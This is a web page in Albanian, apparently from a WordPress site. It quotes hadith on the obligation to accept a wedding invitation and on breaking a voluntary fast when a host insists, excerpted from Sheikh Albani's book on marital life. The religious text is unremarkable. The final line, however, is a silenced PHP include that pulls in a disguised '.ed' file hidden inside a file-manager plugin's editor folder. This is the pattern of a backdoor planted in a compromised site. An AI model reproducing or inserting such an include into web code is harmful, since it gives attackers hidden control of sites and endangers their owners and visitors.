Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

OBLIGUESHMËRIA QE T’I PËRGJIGJEMI THIRRJES

OBLIGUESHMËRIA QE T’I PËRGJIGJEMI THIRRJES

Love Still Life Wide Desktop Background
OBLIGUESHMËRIA QE T’I PËRGJIGJEMI THIRRJES • ..(19)

Secili që thirret në gostinë e martesës, ai e ka për obligim që t’i përgjigjet thirrjes dhe të prezentojë, sepse për këtë përmenden hadithe që transmetohen prej të Dërguarit të Allahut salallahu alejhi ue selem ku thuhet:
“Lironi robërit, përgjigjuni atij që ju thërret dhe vizitoni të sëmurët.”
->(Transmeton Buhariu prej Ebu Musa el-Esh’ariut.)<- "Kur të thirreni në gostinë e martesës, përgjigjuni asaj, ai që nuk përgjigjet, ai ka bërë gjunah ndaj Allahut dhe ndaj Pejgamberit të Tij.) ->(Transmeton Buhariu, IX/198, Muslimi, IV/152, Ahmedi nr. 6337, Bejhekiu, VII/262 prej Ibënu Omerit.)<- ? Duhet t'i përgjigjemi thirrjes, madje edhe nëse jemi agjërueshëm ? Njeriu duhet t'i pwrgjigjet thirrjes, edhe nëse është duke agjëruar, sepse i Dërguari i Allahut salalallahu alejhi ue selem thotë: "Kur ndonjëri prej jush thirret në udhqim, le të përgjigjet, nëse nuk është duke agjëruar le të hajë, ndërsa nëse është duke agjëruar, le të vijë, që do të thotë, le t'i përgjigjet thirrjes." ->(Transmeton Muslimi, IV/153)<- ? Prishja e agjërimit me insistim të atij që ka ftuar në gosti ? Njeriu mund të bëjë iftar nëse është duke agjëruar në mënyrë vullnetare, posaçërisht kur këtë e insiston ai që e ka ftuar në gosti. I Dërguari i Allahut salallahu alejhi ue selem thotë: "Kur ndonjëri prej jush thirret në gosti, le të përgjigjet, nëse do të hajë, le të hajë, ndërsa nëse nëse nuk do, mund të mos hajë." ->(Transmetojnë Muslimi, Ahmedi, III/392.)<- I Dërguari i Allahut salallahu alejhi ue selem thotë: "Ai që agjëron vullnetarisht, ai vetë e vendosë, nëse do ai mund ta vazhdojë agjërimin, ndërsa nëse do mund ta prishë.)<- ->(Transmeton Nesaiu në veprën El-Kubra, II/64, Hakimi, I/439, Bejhekiu, IV/276 prej Simak b. Harbit, ai prej Ebu Salihut, ai prej Ummu Hane si merfu’.)<- Transmetohet prej Aishes radijAllahu'anha se kishte thënë: "Një ditë te unë erdhi i Dërguari i Allahut salallahu alejhi ue selem dhe më pyeti: "A ka diçka për të ngrënë?" Unë iu përgjigja: "Nuk ka." Kaloi një pjesë e ditës, ndërsa mua më sollën një ushqim të quajtur hajsa - ushqim prej hurmave, djathit dhe tëlyenit. Një pjesë të ushqimit ia lashë të Dërguarit të Allahut salallahu alejhi ue selem, kurse ai e donte shumë këtë udhqim. I thash: "O i Dërguari i Allahut, më erdhi si dhuratë ky ushqim - hajsi dhe të lash pak prej tij." Ai tha: "Ma sjell, me të vërtetë kam gdhirë si agjërues." Ai hëngri dhe tha: "Shembulli i agjërimit vullnetar është sikurse shembulli i njeriut i cili prej pasurisë së tij ka ndarë një pjesë për sadaka, nëse do, mund ta ofrojë, ndërsa nëse do, mund ta kthejë." ->(E përmend Nesaiu me zinxhir sahih.)<- ------------------------------------------------------------- Pjesë nga libri: "Kënaqësia bashkëshortore" Autor: Shejh Albani, Allahu e mëshiroftë ------------------------------------------------------------- Vazhdojnë postimet të kapitujve tjerë, inshaAllah..

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";